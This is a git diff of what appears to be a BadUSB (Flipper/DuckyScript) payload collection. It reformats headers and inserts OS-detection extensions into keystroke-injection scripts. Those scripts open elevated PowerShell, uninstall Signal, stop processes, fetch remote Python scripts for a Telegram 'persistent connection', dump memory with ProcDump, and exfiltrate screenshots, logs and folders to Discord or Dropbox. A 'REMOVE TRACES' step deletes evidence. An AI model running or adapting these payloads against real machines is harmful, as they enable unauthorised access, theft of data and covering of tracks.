|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM #### PERMISSIONS SECTION ####
|
REM #### PERMISSIONS SECTION ####
|
||||||
|
STRINGLN sudo su
|
||||||
|
|
||||||
STRING sudo su
|
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING SUDO_PASS
|
STRINGLN #SUDO_PASS
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
|
|
||||||
REM #### VPN SECTION ####
|
REM #### VPN SECTION ####
|
||||||
|
STRINGLN curl #VPN_FILE_LINK > vpn_configuration.ovpn
|
||||||
|
|
||||||
STRING curl
|
|
||||||
STRING VPN_FILE_LINK
|
|
||||||
STRING > vpn_configuration.ovpn
|
|
||||||
ENTER
|
|
||||||
REM It depends by the internet connection
|
REM It depends by the internet connection
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
STRING openvpn vpn_configuration.ovpn
|
STRINGLN openvpn vpn_configuration.ovpn
|
||||||
REM It depends by the computer power
|
REM It depends by the computer power
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM #### REMOVE TRACES ####
|
REM #### REMOVE TRACES ####
|
||||||
|
|
||||||
|
|
||||||
STRING rm vpn_configuration.ovpn
|
STRING rm vpn_configuration.ovpn
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
|
@ -1,12 +1,12 @@
|
||||||
REM_BLOCK
|
REM_BLOCK
|
||||||
################################################################
|
################################################################
|
||||||
# |
|
# #
|
||||||
# Title : Set An Arbitrary And Persistent Tor Circuit |
|
# Title : Set An Arbitrary And Persistent Tor Circuit #
|
||||||
# Author : Aleff |
|
# Author : Aleff #
|
||||||
# Version : 1.0 |
|
# Version : 1.0 #
|
||||||
# Category : Execution |
|
# Category : Execution #
|
||||||
# Target : Windows 10/11; Linux; |
|
# Target : Windows 10/11; Linux; #
|
||||||
# |
|
# #
|
||||||
################################################################
|
################################################################
|
||||||
|
|
||||||
Requirements:
|
Requirements:
|
||||||
|
|
|
@ -1,24 +1,65 @@
|
||||||
REM ########################################################
|
REM_BLOCK
|
||||||
REM # |
|
########################################################
|
||||||
REM # Title : Set An Arbitrary DNS (IPv4 version) |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Set An Arbitrary DNS (IPv4 version) #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 11 |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 11 #
|
||||||
REM ########################################################
|
# #
|
||||||
|
########################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Nothing
|
REM - Nothing
|
||||||
|
|
||||||
|
|
||||||
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
|
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
|
||||||
DEFINE DNS example
|
DEFINE DNS example
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
REM Open Settings
|
REM Open Settings
|
||||||
DELAY 1000
|
|
||||||
GUI
|
GUI
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING settings
|
STRING settings
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
REM ###################################
|
REM_BLOCK
|
||||||
REM # |
|
###################################
|
||||||
REM # Title : Set Tor Bridge |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Set Tor Bridge #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10/11 #
|
||||||
REM ###################################
|
# #
|
||||||
|
###################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Tor installed
|
REM - Tor installed
|
||||||
|
|
|
@ -1,17 +1,61 @@
|
||||||
REM ####################################################################################
|
REM_BLOCK
|
||||||
REM # |
|
####################################################################################
|
||||||
REM # Title : Starting a PowerShell with administrator permissions in Windows |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Starting a PowerShell with administrator permissions in Windows #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ####################################################################################
|
# #
|
||||||
|
####################################################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Nothing
|
REM - Nothing
|
||||||
|
|
||||||
DELAY 1000
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
GUI x
|
GUI x
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING a
|
STRING a
|
||||||
|
|
|
@ -1,28 +1,68 @@
|
||||||
|
REM_BLOCK
|
||||||
REM #####################################################
|
#####################################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Stop A Single Process In Windows |
|
# Title : Stop A Single Process In Windows #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
REM # Category : Execution |
|
# Category : Execution #
|
||||||
REM # Target : Windows 10/11 |
|
# Target : Windows 10/11 #
|
||||||
REM # |
|
# #
|
||||||
REM #####################################################
|
#####################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Nothing
|
REM - Nothing
|
||||||
|
|
||||||
|
|
||||||
REM Write the name of the process that you want to stop
|
REM Write the name of the process that you want to stop
|
||||||
DEFINE PROCESS_NAME example
|
DEFINE PROCESS_NAME example
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
REM Open Task Manager
|
REM Open Task Manager
|
||||||
GUI
|
GUI
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING Task Manager
|
STRINGLN Task Manager
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
REM Goto search bar
|
REM Goto search bar
|
||||||
|
@ -36,9 +76,7 @@ TAB
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
REM Write the process name
|
REM Write the process name
|
||||||
STRING PROCESS_NAME
|
STRINGLN PROCESS_NAME
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
TAB
|
TAB
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
REM #######################################################
|
REM_BLOCK
|
||||||
REM # |
|
#######################################################
|
||||||
REM # Title : Telegram Persistent Connection Linux |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Telegram Persistent Connection Linux #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Linux |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Linux #
|
||||||
REM #######################################################
|
# #
|
||||||
|
#######################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
|
@ -14,7 +16,34 @@ REM - Internet Connection
|
||||||
REM Here you must put your own file link
|
REM Here you must put your own file link
|
||||||
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
|
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
|
||||||
|
|
||||||
DELAY 1000
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
REM #####################################
|
REM_BLOCK
|
||||||
REM # |
|
#####################################
|
||||||
REM # Title : Uninstall Signal |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Uninstall Signal #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM #####################################
|
# #
|
||||||
|
#####################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Plug-And-Play <3
|
REM Plug-And-Play <3
|
||||||
|
|
||||||
|
@ -14,11 +16,52 @@ REM Requirements:
|
||||||
REM - Signal App installed
|
REM - Signal App installed
|
||||||
REM - ExecutionPolicy Bypass
|
REM - ExecutionPolicy Bypass
|
||||||
|
|
||||||
DELAY 2000
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
STRINGLN Stop-Process -Name "Signal"
|
STRINGLN Stop-Process -Name "Signal"
|
||||||
|
|
|
@ -36,17 +36,11 @@ In addition to legal implications, **unauthorized removal of an application can
|
||||||
</a>
|
</a>
|
||||||
<br>Github
|
<br>Github
|
||||||
</td>
|
</td>
|
||||||
<td align="center" width="96">
|
|
||||||
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
|
|
||||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
|
|
||||||
</a>
|
|
||||||
<br>Instagram
|
|
||||||
</td>
|
|
||||||
<td align="center" width="96">
|
<td align="center" width="96">
|
||||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
</a>
|
</a>
|
||||||
<br>Discord
|
<br>Linkedin
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
REM ##############################################################################
|
REM_BLOCK
|
||||||
REM # |
|
##############################################################################
|
||||||
REM # Title : Uninstall A Specific App On Windows Through Control Panel |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Uninstall A Specific App On Windows Through Control Panel #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10/11 #
|
||||||
REM ##############################################################################
|
# #
|
||||||
|
##############################################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - The application you want to uninstall must be installed on the target (?obvious right? ^^)
|
REM - The application you want to uninstall must be installed on the target (?obvious right? ^^)
|
||||||
|
@ -17,15 +19,55 @@ REM - Payload tested on Windows 11 Eng
|
||||||
REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`
|
REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`
|
||||||
DEFINE #APP_NAME example
|
DEFINE #APP_NAME example
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
REM Open Windows research
|
REM Open Windows research
|
||||||
DELAY 2000
|
|
||||||
GUI
|
GUI
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
REM Search and opern explorer app
|
REM Search and opern explorer app
|
||||||
STRING explorer
|
STRINGLN explorer
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
REM Goto search bar and open "Uninstall or change a program" page
|
REM Goto search bar and open "Uninstall or change a program" page
|
||||||
|
|
|
@ -1,18 +1,18 @@
|
||||||
REM ########################################################
|
REM_BLOCK
|
||||||
REM # #
|
########################################################
|
||||||
REM # Title : Dump Windows Memory Through ProcDump #
|
# #
|
||||||
REM # Author : Aleff #
|
# Title : Dump Windows Memory Through ProcDump #
|
||||||
REM # Version : 1.0 #
|
# Author : Aleff #
|
||||||
REM # Category : Exfiltration #
|
# Version : 1.0 #
|
||||||
REM # Target : Windows #
|
# Category : Exfiltration #
|
||||||
REM # #
|
# Target : Windows #
|
||||||
REM ########################################################
|
# #
|
||||||
|
########################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Authorization to execute powershell commands
|
REM - Authorization to execute powershell commands
|
||||||
|
|
||||||
|
|
||||||
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
|
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
|
||||||
DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a
|
DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a
|
||||||
|
|
||||||
|
|
|
@ -1,13 +1,12 @@
|
||||||
REM ###################################################
|
###################################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Exfiltrate Computer Screenshots |
|
# Title : Exfiltrate Computer Screenshots #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
REM # Category : Exfiltrate |
|
# Category : Exfiltrate #
|
||||||
REM # Target : Windows 10-11 |
|
# Target : Windows 10-11 #
|
||||||
REM # |
|
# #
|
||||||
REM ###################################################
|
###################################################
|
||||||
|
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
|
@ -15,12 +14,53 @@ REM - Discord Webhook (or whatever you want for the exfiltration)
|
||||||
REM - ExecutionPolicy Bypass
|
REM - ExecutionPolicy Bypass
|
||||||
REM - Python
|
REM - Python
|
||||||
|
|
||||||
|
|
||||||
REM REQUIRED - Set your Python script link
|
REM REQUIRED - Set your Python script link
|
||||||
DEFINE SCRIPT-PY-LINK example.com
|
DEFINE SCRIPT-PY-LINK example.com
|
||||||
|
|
||||||
|
|
||||||
DELAY 1000
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING powershell
|
STRING powershell
|
||||||
|
|
|
@ -1,11 +1,9 @@
|
||||||
# Exfiltrate Linux Content With Dropbox - BADUSB ✅
|
# Exfiltrate Linux Content With Dropbox
|
||||||
|
|
||||||
A script used to take folder content on Linux Systems.
|
A script used to take folder content on Linux Systems.
|
||||||
|
|
||||||
**Category**: Exfiltration, Execution
|
**Category**: Exfiltration, Execution
|
||||||
|
|
||||||
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
|
|
||||||
|
|
||||||
## Description
|
## Description
|
||||||
|
|
||||||
A script used to take folder content on Linux Systems.
|
A script used to take folder content on Linux Systems.
|
||||||
|
|
|
@ -1,12 +1,10 @@
|
||||||
|
|
||||||
# Exfiltrate Linux Log Files - BADUSB ✅
|
# Exfiltrate Linux Log Files
|
||||||
|
|
||||||
A script used to take linux logs.
|
A script used to take linux logs.
|
||||||
|
|
||||||
**Category**: Exfiltration, Execution
|
**Category**: Exfiltration, Execution
|
||||||
|
|
||||||
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
|
|
||||||
|
|
||||||
## Description
|
## Description
|
||||||
|
|
||||||
A script used to take linux logs.
|
A script used to take linux logs.
|
||||||
|
|
|
@ -1,80 +1,93 @@
|
||||||
REM ######################################################
|
REM_BLOCK
|
||||||
REM # |
|
######################################################
|
||||||
REM # Title : Exfiltrate Linux Logs With Dropbox |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Exfiltrate Linux Logs With Dropbox #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Exfiltration, Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Linux |
|
# Category : Exfiltration, Execution #
|
||||||
REM # |
|
# Target : Linux #
|
||||||
REM ######################################################
|
# #
|
||||||
|
######################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
REM - Dropbox Account
|
REM - Dropbox Account
|
||||||
REM - - DROPBOX_ACCESS_TOKEN
|
REM - - DROPBOX_ACCESS_TOKEN
|
||||||
|
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
CTRL-ALT t
|
|
||||||
|
|
||||||
REM Required: Set here your Dropbox access TOKEN
|
REM Required: Set here your Dropbox access TOKEN
|
